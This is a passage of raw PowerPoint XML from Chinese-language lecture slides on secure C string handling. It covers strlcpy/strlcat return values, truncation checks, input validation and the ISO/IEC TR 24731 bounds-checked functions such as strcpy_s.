              </a:rPr>
              <a:t>sizeof()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>操作来获取。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>动态缓冲区的大小不容易计算</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>两个函数都确保目标字符串对所有非零长度的缓冲区来说都是非空结尾的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8869659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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串截断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1981200"/>
            <a:ext cx="8229600" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcat()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>函数返回它们希望创建的字符串的总长度。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>简单返回源字符串的总长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> that is simply the length of the source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcat()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回（连接前）目标字符串的长度加上源字符串的长度。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>为了检查字符串截断，程序需要验证返回值是否小于参数大小。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如果返回的字符串被程序员截断了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>知道需要存储的字符串的字节数目</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>可能重新分配或者重新复制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="220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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="542668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2673F-4C84-4669-A9C2-3466516FA65E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串数据基本概念</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9C7EA0-BB38-49B2-B712-08B22CEE8245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{995E8DC3-6773-B14F-B697-ECFEC989770F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47E38ADD-2EC8-4396-AF5F-6467A1D00170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="196850" y="2258732"/>
            <a:ext cx="8947150" cy="3984906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40223718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sz="3300">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3300">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3300">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3300">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3300">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcat()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3300">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3300">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3500">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501650" y="1981200"/>
            <a:ext cx="8140700" cy="3752056"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>在几个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>变体中包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> OpenBSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> Solaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>中可以使用，但不包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>GNU/Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如果指定的缓冲区大小比实际的缓冲区长度长，不正确的使用这些函数仍然可能会导致缓冲区溢出。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如果程序员无法验证这些函数结果，仍可能发生截断错误。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1716804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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>静态防范方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="2209800"/>
            <a:ext cx="8140700" cy="4435475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>输入验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcat()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ISO/IEC “Security” TR 24731</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16470594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en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ISO/IEC “Security” TR 24731</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>国际标准化工作小组工作的编程语言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C (ISO/IEC JTC1 SC22 WG14)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ISO/IEC TR 24731 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>定义更少出错的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>标准函数版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy_s()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代替</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcat_s()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代替</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcat()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strncpy_s()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代替</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strncpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
